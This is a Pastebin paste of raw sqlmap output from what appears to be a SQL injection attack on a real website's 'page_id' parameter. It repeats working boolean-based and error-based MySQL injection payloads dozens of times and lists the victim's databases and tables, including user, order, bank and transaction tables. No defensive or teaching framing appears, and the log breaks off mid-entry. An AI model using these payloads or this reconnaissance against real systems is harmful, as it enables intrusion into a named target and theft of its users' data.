API tools faq
paste
Advertisement
Multiplexor

Untitled

Multiplexor
Jan 6th, 2012
2,225
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 34.96 KB | None | 0 0
raw download clone embed print report
  1.  #     #                                                                
  2.  ##   ## #    # #      ##### # #####  #      ###### #    #  ####  #####  
  3.  # # # # #    # #        #   # #    # #      #       #  #  #    # #    #
  4.  #  #  # #    # #        #   # #    # #      #####    ##   #    # #    #
  5.  #     # #    # #        #   # #####  #      #        ##   #    # #####  
  6.  #     # #    # #        #   # #      #      #       #  #  #    # #   #  
  7.  #     #  ####  ######   #   # #      ###### ###### #    #  ####  #    #          
  8.  
  9.  
  10.  
  11. sqlmap IDENTIFIED the following injection points WITH a total OF 28 HTTP(s) requests:
  12. ---
  13. Place: GET
  14. Parameter: page_id
  15.     TYPE: boolean-based blind
  16.     Title: AND boolean-based blind - WHERE OR HAVING clause
  17.     Payload: page_id=28167956 AND 1228=1228
  18.  
  19.     TYPE: error-based
  20.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  21.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  22. ---
  23.  
  24. available DATABASES [9]:
  25. [*] information_schema
  26. [*] mysql
  27. [*] orcataco_bumperstic
  28. [*] orcataco_officerjones
  29. [*] orcataco_officerjones_1
  30. [*] orcataco_officerjones_2
  31. [*] orcataco_snap
  32. [*] signedbump
  33. [*] test
  34.  
  35. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  36. ---
  37. Place: GET
  38. Parameter: page_id
  39.     TYPE: boolean-based blind
  40.     Title: AND boolean-based blind - WHERE OR HAVING clause
  41.     Payload: page_id=28167956 AND 1228=1228
  42.  
  43.     TYPE: error-based
  44.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  45.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  46. ---
  47.  
  48. DATABASE: mysql
  49. [17 TABLES]
  50. +---------------------------+
  51. | columns_priv              |
  52. | db                        |
  53. | func                      |
  54. | help_category             |
  55. | help_keyword              |
  56. | help_relation             |
  57. | help_topic                |
  58. | host                      |
  59. | proc                      |
  60. | procs_priv                |
  61. | tables_priv               |
  62. | time_zone                 |
  63. | time_zone_leap_second     |
  64. | time_zone_name            |
  65. | time_zone_transition      |
  66. | time_zone_transition_type |
  67. | USER                      |
  68. +---------------------------+
  69.  
  70. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  71. ---
  72. Place: GET
  73. Parameter: page_id
  74.     TYPE: boolean-based blind
  75.     Title: AND boolean-based blind - WHERE OR HAVING clause
  76.     Payload: page_id=28167956 AND 1228=1228
  77.  
  78.     TYPE: error-based
  79.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  80.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  81. ---
  82.  
  83. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  84. ---
  85. Place: GET
  86. Parameter: page_id
  87.     TYPE: boolean-based blind
  88.     Title: AND boolean-based blind - WHERE OR HAVING clause
  89.     Payload: page_id=28167956 AND 1228=1228
  90.  
  91.     TYPE: error-based
  92.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  93.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  94. ---
  95.  
  96. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  97. ---
  98. Place: GET
  99. Parameter: page_id
  100.     TYPE: boolean-based blind
  101.     Title: AND boolean-based blind - WHERE OR HAVING clause
  102.     Payload: page_id=28167956 AND 1228=1228
  103.  
  104.     TYPE: error-based
  105.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  106.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  107. ---
  108.  
  109. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  110. ---
  111. Place: GET
  112. Parameter: page_id
  113.     TYPE: boolean-based blind
  114.     Title: AND boolean-based blind - WHERE OR HAVING clause
  115.     Payload: page_id=28167956 AND 1228=1228
  116.  
  117.     TYPE: error-based
  118.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  119.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  120. ---
  121.  
  122. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  123. ---
  124. Place: GET
  125. Parameter: page_id
  126.     TYPE: boolean-based blind
  127.     Title: AND boolean-based blind - WHERE OR HAVING clause
  128.     Payload: page_id=28167956 AND 1228=1228
  129.  
  130.     TYPE: error-based
  131.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  132.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  133. ---
  134.  
  135. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  136. ---
  137. Place: GET
  138. Parameter: page_id
  139.     TYPE: boolean-based blind
  140.     Title: AND boolean-based blind - WHERE OR HAVING clause
  141.     Payload: page_id=28167956 AND 1228=1228
  142.  
  143.     TYPE: error-based
  144.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  145.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  146. ---
  147.  
  148. available DATABASES [9]:
  149. [*] information_schema
  150. [*] mysql
  151. [*] orcataco_bumperstic
  152. [*] orcataco_officerjones
  153. [*] orcataco_officerjones_1
  154. [*] orcataco_officerjones_2
  155. [*] orcataco_snap
  156. [*] signedbump
  157. [*] test
  158.  
  159. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  160. ---
  161. Place: GET
  162. Parameter: page_id
  163.     TYPE: boolean-based blind
  164.     Title: AND boolean-based blind - WHERE OR HAVING clause
  165.     Payload: page_id=28167956 AND 1228=1228
  166.  
  167.     TYPE: error-based
  168.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  169.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  170. ---
  171.  
  172. DATABASE: orcataco_bumperstic
  173. [113 TABLES]
  174. +--------------------------+
  175. | _settings                |
  176. | bank                     |
  177. | basket_items             |
  178. | basket_orders            |
  179. | basket_tags              |
  180. | baskets                  |
  181. | brands                   |
  182. | bsuids                   |
  183. | categories               |
  184. | clickemail               |
  185. | clickwizard              |
  186. | comment                  |
  187. | counters                 |
  188. | counters_i12             |
  189. | counters_i24             |
  190. | counters_o12             |
  191. | counters_o24             |
  192. | emailsendlog             |
  193. | favorite_orders          |
  194. | feedback                 |
  195. | game                     |
  196. | game_score               |
  197. | hm_events                |
  198. | hm_message_queue         |
  199. | invited                  |
  200. | invited_from_force       |
  201. | item_book                |
  202. | item_tags                |
  203. | items                    |
  204. | line_items               |
  205. | logadd                   |
  206. | logcontacts              |
  207. | loggiftclick             |
  208. | logimport                |
  209. | loginvite                |
  210. | loginvited               |
  211. | logvalidate              |
  212. | logwizard                |
  213. | motd                     |
  214. | notified                 |
  215. | notify_off               |
  216. | occasions                |
  217. | orders                   |
  218. | orders_non_facebook      |
  219. | page_items               |
  220. | played                   |
  221. | post_install_items       |
  222. | post_install_items_v2    |
  223. | profile_settings         |
  224. | public_pages             |
  225. | publish_stream_sgnonpred |
  226. | purchase                 |
  227. | quicksender              |
  228. | recent_users             |
  229. | reply_from_hist          |
  230. | requests_sent            |
  231. | rpd_by_day               |
  232. | sendqueue                |
  233. | sendsthisweek            |
  234. | sendsthisweek2           |
  235. | sent                     |
  236. | settings                 |
  237. | stream_posts             |
  238. | survey_answers           |
  239. | survey_questions         |
  240. | tag_stats                |
  241. | tags                     |
  242. | temp_birthday_orders     |
  243. | temp_click_events        |
  244. | temp_daily_stats         |
  245. | temp_despicable_me       |
  246. | temp_funnel_test_orders  |
  247. | temp_hourly_stats        |
  248. | temp_invite_stats        |
  249. | temp_invite_stats_v2     |
  250. | temp_item_recs2          |
  251. | temp_nectar_ads          |
  252. | temp_nectar_stats_v2     |
  253. | temp_order_clicks        |
  254. | temp_page_counter        |
  255. | temp_page_visits         |
  256. | temp_premium_orders      |
  257. | temp_request_demo_stats  |
  258. | temp_request_stats       |
  259. | temp_retention_daily     |
  260. | temp_retention_weekly    |
  261. | temp_sendgroup_members   |
  262. | temp_sendgroup_sends     |
  263. | temp_test_order_users    |
  264. | temp_test_orders         |
  265. | temp_tutorial_stages     |
  266. | temp_user_credits        |
  267. | temp_userbase            |
  268. | theme_tag_map            |
  269. | theme_tags               |
  270. | themes                   |
  271. | themes_user_gen          |
  272. | transactions             |
  273. | uids                     |
  274. | unlocked                 |
  275. | unopened                 |
  276. | unsent                   |
  277. | unsubscribe              |
  278. | user_country             |
  279. | user_groups              |
  280. | user_items               |
  281. | user_pages               |
  282. | user_pageviews           |
  283. | user_pageviews_v2        |
  284. | user_themes              |
  285. | userbase                 |
  286. | winner                   |
  287. | wishlist                 |
  288. +--------------------------+
  289.  
  290. DATABASE: test
  291. [21 TABLES]
  292. +------------------------+
  293. | TempTable              |
  294. | appinfo                |
  295. | autoincr               |
  296. | cur                    |
  297. | deals                  |
  298. | errorcounts            |
  299. | errorfromfirst1000     |
  300. | install_metrics        |
  301. | installs_by_day        |
  302. | installs_by_invite_day |
  303. | invited_from_force     |
  304. | invites_by_day         |
  305. | invites_by_newuser_day |
  306. | ret_users2             |
  307. | retlog                 |
  308. | rpdbyda                |
  309. | send_log               |
  310. | uids                   |
  311. | user_country           |
  312. | x                      |
  313. | y                      |
  314. +------------------------+
  315.  
  316. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  317. ---
  318. Place: GET
  319. Parameter: page_id
  320.     TYPE: boolean-based blind
  321.     Title: AND boolean-based blind - WHERE OR HAVING clause
  322.     Payload: page_id=28167956 AND 1228=1228
  323.  
  324.     TYPE: error-based
  325.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  326.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  327. ---
  328.  
  329. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  330. ---
  331. Place: GET
  332. Parameter: page_id
  333.     TYPE: boolean-based blind
  334.     Title: AND boolean-based blind - WHERE OR HAVING clause
  335.     Payload: page_id=28167956 AND 1228=1228
  336.  
  337.     TYPE: error-based
  338.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  339.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  340. ---
  341.  
  342. DATABASE: test
  343. [21 TABLES]
  344. +------------------------+
  345. | TempTable              |
  346. | appinfo                |
  347. | autoincr               |
  348. | cur                    |
  349. | deals                  |
  350. | errorcounts            |
  351. | errorfromfirst1000     |
  352. | install_metrics        |
  353. | installs_by_day        |
  354. | installs_by_invite_day |
  355. | invited_from_force     |
  356. | invites_by_day         |
  357. | invites_by_newuser_day |
  358. | ret_users2             |
  359. | retlog                 |
  360. | rpdbyda                |
  361. | send_log               |
  362. | uids                   |
  363. | user_country           |
  364. | x                      |
  365. | y                      |
  366. +------------------------+
  367.  
  368. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  369. ---
  370. Place: GET
  371. Parameter: page_id
  372.     TYPE: boolean-based blind
  373.     Title: AND boolean-based blind - WHERE OR HAVING clause
  374.     Payload: page_id=28167956 AND 1228=1228
  375.  
  376.     TYPE: error-based
  377.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  378.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  379. ---
  380.  
  381. DATABASE: orcataco_bumperstic
  382. [113 TABLES]
  383. +--------------------------+
  384. | _settings                |
  385. | bank                     |
  386. | basket_items             |
  387. | basket_orders            |
  388. | basket_tags              |
  389. | baskets                  |
  390. | brands                   |
  391. | bsuids                   |
  392. | categories               |
  393. | clickemail               |
  394. | clickwizard              |
  395. | comment                  |
  396. | counters                 |
  397. | counters_i12             |
  398. | counters_i24             |
  399. | counters_o12             |
  400. | counters_o24             |
  401. | emailsendlog             |
  402. | favorite_orders          |
  403. | feedback                 |
  404. | game                     |
  405. | game_score               |
  406. | hm_events                |
  407. | hm_message_queue         |
  408. | invited                  |
  409. | invited_from_force       |
  410. | item_book                |
  411. | item_tags                |
  412. | items                    |
  413. | line_items               |
  414. | logadd                   |
  415. | logcontacts              |
  416. | loggiftclick             |
  417. | logimport                |
  418. | loginvite                |
  419. | loginvited               |
  420. | logvalidate              |
  421. | logwizard                |
  422. | motd                     |
  423. | notified                 |
  424. | notify_off               |
  425. | occasions                |
  426. | orders                   |
  427. | orders_non_facebook      |
  428. | page_items               |
  429. | played                   |
  430. | post_install_items       |
  431. | post_install_items_v2    |
  432. | profile_settings         |
  433. | public_pages             |
  434. | publish_stream_sgnonpred |
  435. | purchase                 |
  436. | quicksender              |
  437. | recent_users             |
  438. | reply_from_hist          |
  439. | requests_sent            |
  440. | rpd_by_day               |
  441. | sendqueue                |
  442. | sendsthisweek            |
  443. | sendsthisweek2           |
  444. | sent                     |
  445. | settings                 |
  446. | stream_posts             |
  447. | survey_answers           |
  448. | survey_questions         |
  449. | tag_stats                |
  450. | tags                     |
  451. | temp_birthday_orders     |
  452. | temp_click_events        |
  453. | temp_daily_stats         |
  454. | temp_despicable_me       |
  455. | temp_funnel_test_orders  |
  456. | temp_hourly_stats        |
  457. | temp_invite_stats        |
  458. | temp_invite_stats_v2     |
  459. | temp_item_recs2          |
  460. | temp_nectar_ads          |
  461. | temp_nectar_stats_v2     |
  462. | temp_order_clicks        |
  463. | temp_page_counter        |
  464. | temp_page_visits         |
  465. | temp_premium_orders      |
  466. | temp_request_demo_stats  |
  467. | temp_request_stats       |
  468. | temp_retention_daily     |
  469. | temp_retention_weekly    |
  470. | temp_sendgroup_members   |
  471. | temp_sendgroup_sends     |
  472. | temp_test_order_users    |
  473. | temp_test_orders         |
  474. | temp_tutorial_stages     |
  475. | temp_user_credits        |
  476. | temp_userbase            |
  477. | theme_tag_map            |
  478. | theme_tags               |
  479. | themes                   |
  480. | themes_user_gen          |
  481. | transactions             |
  482. | uids                     |
  483. | unlocked                 |
  484. | unopened                 |
  485. | unsent                   |
  486. | unsubscribe              |
  487. | user_country             |
  488. | user_groups              |
  489. | user_items               |
  490. | user_pages               |
  491. | user_pageviews           |
  492. | user_pageviews_v2        |
  493. | user_themes              |
  494. | userbase                 |
  495. | winner                   |
  496. | wishlist                 |
  497. +--------------------------+
  498.  
  499. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  500. ---
  501. Place: GET
  502. Parameter: page_id
  503.     TYPE: boolean-based blind
  504.     Title: AND boolean-based blind - WHERE OR HAVING clause
  505.     Payload: page_id=28167956 AND 1228=1228
  506.  
  507.     TYPE: error-based
  508.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  509.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  510. ---
  511.  
  512. DATABASE: orcataco_bumperstic
  513. [113 TABLES]
  514. +--------------------------+
  515. | _settings                |
  516. | bank                     |
  517. | basket_items             |
  518. | basket_orders            |
  519. | basket_tags              |
  520. | baskets                  |
  521. | brands                   |
  522. | bsuids                   |
  523. | categories               |
  524. | clickemail               |
  525. | clickwizard              |
  526. | comment                  |
  527. | counters                 |
  528. | counters_i12             |
  529. | counters_i24             |
  530. | counters_o12             |
  531. | counters_o24             |
  532. | emailsendlog             |
  533. | favorite_orders          |
  534. | feedback                 |
  535. | game                     |
  536. | game_score               |
  537. | hm_events                |
  538. | hm_message_queue         |
  539. | invited                  |
  540. | invited_from_force       |
  541. | item_book                |
  542. | item_tags                |
  543. | items                    |
  544. | line_items               |
  545. | logadd                   |
  546. | logcontacts              |
  547. | loggiftclick             |
  548. | logimport                |
  549. | loginvite                |
  550. | loginvited               |
  551. | logvalidate              |
  552. | logwizard                |
  553. | motd                     |
  554. | notified                 |
  555. | notify_off               |
  556. | occasions                |
  557. | orders                   |
  558. | orders_non_facebook      |
  559. | page_items               |
  560. | played                   |
  561. | post_install_items       |
  562. | post_install_items_v2    |
  563. | profile_settings         |
  564. | public_pages             |
  565. | publish_stream_sgnonpred |
  566. | purchase                 |
  567. | quicksender              |
  568. | recent_users             |
  569. | reply_from_hist          |
  570. | requests_sent            |
  571. | rpd_by_day               |
  572. | sendqueue                |
  573. | sendsthisweek            |
  574. | sendsthisweek2           |
  575. | sent                     |
  576. | settings                 |
  577. | stream_posts             |
  578. | survey_answers           |
  579. | survey_questions         |
  580. | tag_stats                |
  581. | tags                     |
  582. | temp_birthday_orders     |
  583. | temp_click_events        |
  584. | temp_daily_stats         |
  585. | temp_despicable_me       |
  586. | temp_funnel_test_orders  |
  587. | temp_hourly_stats        |
  588. | temp_invite_stats        |
  589. | temp_invite_stats_v2     |
  590. | temp_item_recs2          |
  591. | temp_nectar_ads          |
  592. | temp_nectar_stats_v2     |
  593. | temp_order_clicks        |
  594. | temp_page_counter        |
  595. | temp_page_visits         |
  596. | temp_premium_orders      |
  597. | temp_request_demo_stats  |
  598. | temp_request_stats       |
  599. | temp_retention_daily     |
  600. | temp_retention_weekly    |
  601. | temp_sendgroup_members   |
  602. | temp_sendgroup_sends     |
  603. | temp_test_order_users    |
  604. | temp_test_orders         |
  605. | temp_tutorial_stages     |
  606. | temp_user_credits        |
  607. | temp_userbase            |
  608. | theme_tag_map            |
  609. | theme_tags               |
  610. | themes                   |
  611. | themes_user_gen          |
  612. | transactions             |
  613. | uids                     |
  614. | unlocked                 |
  615. | unopened                 |
  616. | unsent                   |
  617. | unsubscribe              |
  618. | user_country             |
  619. | user_groups              |
  620. | user_items               |
  621. | user_pages               |
  622. | user_pageviews           |
  623. | user_pageviews_v2        |
  624. | user_themes              |
  625. | userbase                 |
  626. | winner                   |
  627. | wishlist                 |
  628. +--------------------------+
  629.  
  630. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  631. ---
  632. Place: GET
  633. Parameter: page_id
  634.     TYPE: boolean-based blind
  635.     Title: AND boolean-based blind - WHERE OR HAVING clause
  636.     Payload: page_id=28167956 AND 1228=1228
  637.  
  638.     TYPE: error-based
  639.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  640.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  641. ---
  642.  
  643. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  644. ---
  645. Place: GET
  646. Parameter: page_id
  647.     TYPE: boolean-based blind
  648.     Title: AND boolean-based blind - WHERE OR HAVING clause
  649.     Payload: page_id=28167956 AND 1228=1228
  650.  
  651.     TYPE: error-based
  652.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  653.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  654. ---
  655.  
  656. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  657. ---
  658. Place: GET
  659. Parameter: page_id
  660.     TYPE: boolean-based blind
  661.     Title: AND boolean-based blind - WHERE OR HAVING clause
  662.     Payload: page_id=28167956 AND 1228=1228
  663.  
  664.     TYPE: error-based
  665.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  666.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  667. ---
  668.  
  669. DATABASE: orcataco_bumperstic
  670. [113 TABLES]
  671. +--------------------------+
  672. | _settings                |
  673. | bank                     |
  674. | basket_items             |
  675. | basket_orders            |
  676. | basket_tags              |
  677. | baskets                  |
  678. | brands                   |
  679. | bsuids                   |
  680. | categories               |
  681. | clickemail               |
  682. | clickwizard              |
  683. | comment                  |
  684. | counters                 |
  685. | counters_i12             |
  686. | counters_i24             |
  687. | counters_o12             |
  688. | counters_o24             |
  689. | emailsendlog             |
  690. | favorite_orders          |
  691. | feedback                 |
  692. | game                     |
  693. | game_score               |
  694. | hm_events                |
  695. | hm_message_queue         |
  696. | invited                  |
  697. | invited_from_force       |
  698. | item_book                |
  699. | item_tags                |
  700. | items                    |
  701. | line_items               |
  702. | logadd                   |
  703. | logcontacts              |
  704. | loggiftclick             |
  705. | logimport                |
  706. | loginvite                |
  707. | loginvited               |
  708. | logvalidate              |
  709. | logwizard                |
  710. | motd                     |
  711. | notified                 |
  712. | notify_off               |
  713. | occasions                |
  714. | orders                   |
  715. | orders_non_facebook      |
  716. | page_items               |
  717. | played                   |
  718. | post_install_items       |
  719. | post_install_items_v2    |
  720. | profile_settings         |
  721. | public_pages             |
  722. | publish_stream_sgnonpred |
  723. | purchase                 |
  724. | quicksender              |
  725. | recent_users             |
  726. | reply_from_hist          |
  727. | requests_sent            |
  728. | rpd_by_day               |
  729. | sendqueue                |
  730. | sendsthisweek            |
  731. | sendsthisweek2           |
  732. | sent                     |
  733. | settings                 |
  734. | stream_posts             |
  735. | survey_answers           |
  736. | survey_questions         |
  737. | tag_stats                |
  738. | tags                     |
  739. | temp_birthday_orders     |
  740. | temp_click_events        |
  741. | temp_daily_stats         |
  742. | temp_despicable_me       |
  743. | temp_funnel_test_orders  |
  744. | temp_hourly_stats        |
  745. | temp_invite_stats        |
  746. | temp_invite_stats_v2     |
  747. | temp_item_recs2          |
  748. | temp_nectar_ads          |
  749. | temp_nectar_stats_v2     |
  750. | temp_order_clicks        |
  751. | temp_page_counter        |
  752. | temp_page_visits         |
  753. | temp_premium_orders      |
  754. | temp_request_demo_stats  |
  755. | temp_request_stats       |
  756. | temp_retention_daily     |
  757. | temp_retention_weekly    |
  758. | temp_sendgroup_members   |
  759. | temp_sendgroup_sends     |
  760. | temp_test_order_users    |
  761. | temp_test_orders         |
  762. | temp_tutorial_stages     |
  763. | temp_user_credits        |
  764. | temp_userbase            |
  765. | theme_tag_map            |
  766. | theme_tags               |
  767. | themes                   |
  768. | themes_user_gen          |
  769. | transactions             |
  770. | uids                     |
  771. | unlocked                 |
  772. | unopened                 |
  773. | unsent                   |
  774. | unsubscribe              |
  775. | user_country             |
  776. | user_groups              |
  777. | user_items               |
  778. | user_pages               |
  779. | user_pageviews           |
  780. | user_pageviews_v2        |
  781. | user_themes              |
  782. | userbase                 |
  783. | winner                   |
  784. | wishlist                 |
  785. +--------------------------+
  786.  
  787. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  788. ---
  789. Place: GET
  790. Parameter: page_id
  791.     TYPE: boolean-based blind
  792.     Title: AND boolean-based blind - WHERE OR HAVING clause
  793.     Payload: page_id=28167956 AND 1228=1228
  794.  
  795.     TYPE: error-based
  796.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  797.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  798. ---
  799.  
  800. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  801. ---
  802. Place: GET
  803. Parameter: page_id
  804.     TYPE: boolean-based blind
  805.     Title: AND boolean-based blind - WHERE OR HAVING clause
  806.     Payload: page_id=28167956 AND 1228=1228
  807.  
  808.     TYPE: error-based
  809.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  810.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  811. ---
  812.  
  813. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  814. ---
  815. Place: GET
  816. Parameter: page_id
  817.     TYPE: boolean-based blind
  818.     Title: AND boolean-based blind - WHERE OR HAVING clause
  819.     Payload: page_id=28167956 AND 1228=1228
  820.  
  821.     TYPE: error-based
  822.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  823.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  824. ---
  825.  
  826. help [1]:
  827.  
  828. wget txt [1]:
  829.  
  830. ? [1]:
  831.  
  832. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  833. ---
  834. Place: GET
  835. Parameter: page_id
  836.     TYPE: boolean-based blind
  837.     Title: AND boolean-based blind - WHERE OR HAVING clause
  838.     Payload: page_id=28167956 AND 1228=1228
  839.  
  840.     TYPE: error-based
  841.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  842.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  843. ---
  844.  
  845. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  846. ---
  847. Place: GET
  848. Parameter: page_id
  849.     TYPE: boolean-based blind
  850.     Title: AND boolean-based blind - WHERE OR HAVING clause
